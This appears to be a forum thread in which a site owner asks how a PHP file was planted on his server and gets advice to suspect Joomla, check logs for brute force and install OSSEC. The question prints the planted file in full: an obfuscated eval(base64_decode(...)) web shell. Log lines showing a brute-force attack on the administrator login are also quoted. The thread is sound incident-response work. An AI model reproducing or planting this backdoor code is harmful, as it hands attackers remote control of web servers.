What kind of a hack is this?

Posted on 2014-12-23
Medium Priority
Last Modified: 2014-12-23
I had a bunch of PHP files messed up yesterday by some script.  The common thing is they had 666 permissions rather than 644.  But ... still ... a script had access to mess the files up.

This morning I find these lines in one of the logs: - - [23/Dec/2014:00:05:06 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1" - - [23/Dec/2014:04:03:17 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"

And the PHP file in question is this:

<?php /*m\i2s-*/eval/*Ad?K8s*/(/*jHF&*/base64_decode/*(~G+z*/(/*=32*/'Lyp6OTNaYn0qL2V2YWwvKjNZezMqLygvKjcuSz1pWyovYmFzZTY0X2RlY29kZS8qRHFHeyovKC8qLno2K'/*ueL<*/./*6 qH*/'WVFWiovJ0x5cE1VM3RUSmlvdmFXWXZLa0EyZlc5UWZpb3ZLQzhxWicvKlE/c3IwaiovLi8qOnxASCovJ1'/*HnRA*/./*Cdlj=.*/'ZGK0tpOXBjM05sZEM4cU0yWWhZaTVZWkNvdktDOHFYMScvKl9pfTVSR3oqLy4vKmpxdH02Ki8nMUtLaTh'/*!.R5*/./*ehZS%*/'rWDFKRlVWVkZVMVF2S2w4bUxEOUpVeW92V3k4Jy8qIW9KdUQqLy4vKm97NEcqLydxSVRFd1VWOHdXU292'/*PKlM}%*/./*n{*/'SjNrbkx5b3RleWhxY3k1QUtpOHUnLypLVy58Wi0qLy4vKkk5WnFdW0gqLydMeW9zS0d3cEtpOG5aeWN2S'/*<o!}3*/./*}en~p*/'240OFZtc3FMeTR2S24xdFAnLyorWDB7ciovLi8qVVJMdSovJ2xoTE15b3ZKM2tuTHlwN1MxeDdkeW92TG'/*E;4=]*/./*(9S*/'k4cUlHMXBVbCcvKmR4a25EayovLi8qN3VCKi8nb3FMeWQ0Snk4cVRqazVLaTh1THlwcWJERitVellxTHl'/*{HYT2t*/./*;0UAF9*/'kJy8qVF9ePDMqLy4vKkF3RGIqLydrSnk4cVRIQmhOU292WFM4cU9YazFTRlVxTHk4cWFqNWwnLyowMjd0'/*_R|W*/./*f-KQq_*/'Ki8uLypJY099IFRyKi8nVlY0cUx5a3ZLbTQwTFc0cUx5OHFOVlZOYm1SYUtpOHBMJy8qR25IeCovLi8qO'/*hc]4b*/./*K^oB5y*/'nlvbEAqLyd5cFZlazl2YlhFcUwyVjJZV3d2S2poK0prMGhTeW92S0MnLyogaChbc3pUNSovLi8qeWllcW'/*X(4J:@*/./*5,>*/'tyUCovJzhxUURaZVF5b3ZjM1J5YVhCemJHRnphR1Z6THlweElGQScvKjNmVWhUKi8uLypeMngzKi8nc0x'/*s:@*/./*gf=*/'pb3ZLQzhxT0U1ek1WZ3lZQ292SkY5U1JWRlZSVk5VJy8qLEJxPTVwaSovLi8qTilTMCUqLydMeW9oVVZo'/*b>x]*/./*>|TG*/'b1Fsd3FMMXN2S2lWN1p6Z3pLaThuZVNjdksnLypgRzhOZlcqLy4vKiVZNSovJ2tjaFhqQXFMeTR2S2xGd'/*t|qE5*/./*(}XycS*/'FlrOHNLaThuWnljdktrZzZiUycvKkt4WkElSEgqLy4vKjB+VS0qLydvdkxpOHFRSEZZYkRVcUx5ZDVlR1'/*[:I*/./*:bP*/'FuTHlvaGZTaFNLaTknLyp9KF9yUiovLi8qTW5VZGsuXSovJ2RMeXBYT25wRFlGa3FMeThxTWljc1czNXZ'/*wEy93*/./*?0{^*/'LaThwTHlvZycvKlVSXWJ0Ki8uLypJaS4qLydYVUk0VWlvdkx5bzVLWGw0Y0NvdktTOHFVbXRpVnp0OUsn'/*u}C*/./*5_D0*/'LypJUWZ4Ki8uLyp7LHsxeTgqLydpOHZLa1ZmYlc4NVFrQlVLaTg3THlwWWFubGVjU2h3YVNvdicvKkEnJ'/*!ja*/./*~J_n*/'05SXHhqKi8pLyopK215PSovLypzMC1nWztJKi8pLypZXHQ1ZlEqLy8qcEVRZ0xbXyovOy8qfEo0LT8qLw=='/*uRn34*/)/*kzY!*//*JJD*/)/*:@uW*//*BN9T*/;/*ZTX%*/ ?>

Open in new window

What kind of attack is this? I want to correct more completely than just locking down the permissions so that the script doesn't work.

Of course, I'll delete the PHP file, but ... there's a vulnerability involved that allowed the file to be placed there.  I want to close that down.

Question by:Daniel Wilson
  • 2
  • 2
LVL 58

Expert Comment

ID: 40514876
What are you running?
Wordpress or similar?
The contact form is the usual way to hack if it was done through the website or one of the plugins/vulnerabilities of WP et al
Otherwise you need to check the server logs for SSH/FTP brute force attacks
LVL 32

Author Comment

by:Daniel Wilson
ID: 40514886
There is one Joomla site ... though most are hand-coded PHP.

Thanks for the tip ... I'll look harder at some of those other logs.
LVL 58

Accepted Solution

Gary earned 2000 total points
ID: 40514888
Joomla would be the one I would be looking at with stern eyes.
LVL 32

Author Comment

by:Daniel Wilson
ID: 40514900
Looks like it's been quite a target.  I have hundreds of lines like this from one IP in the same day. - - [03/Nov/2014:23:20:35 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" - - [03/Nov/2014:23:20:35 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" - - [03/Nov/2014:23:20:36 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" - - [03/Nov/2014:23:20:36 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"

Open in new window

LVL 36

Expert Comment

ID: 40514976
If you have root access (e.g. dedicated server, VPS, etc), then try using OSSEC to help secure your site against random attacks like this.

Here's a good tutorial on how to set it up:

The tutorial is geared towards Wordpress but OSSEC is a general-purpose security application:

Featured Post

We Need Your Input!

WatchGuard is currently running a beta program for our new macOS Host Sensor for our Threat Detection and Response service. We're looking for more macOS users to help provide insight and feedback to help us make the product even better. Please sign up for our beta program today!

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

It’s a season to be thankful, and we’re thankful for users like you who engage on site, solve technology problems, and network with others in the industry. What tech are we most thankful for? Keep reading.
An Incident response plan is an organized approach to addressing and managing an incident. The goal is to handle the situation in a way that limits damage and reduces recovery time and costs.
Learn how to match and substitute tagged data using PHP regular expressions. Demonstrated on Windows 7, but also applies to other operating systems. Demonstrated technique applies to PHP (all versions) and Firefox, but very similar techniques will w…
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…

624 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question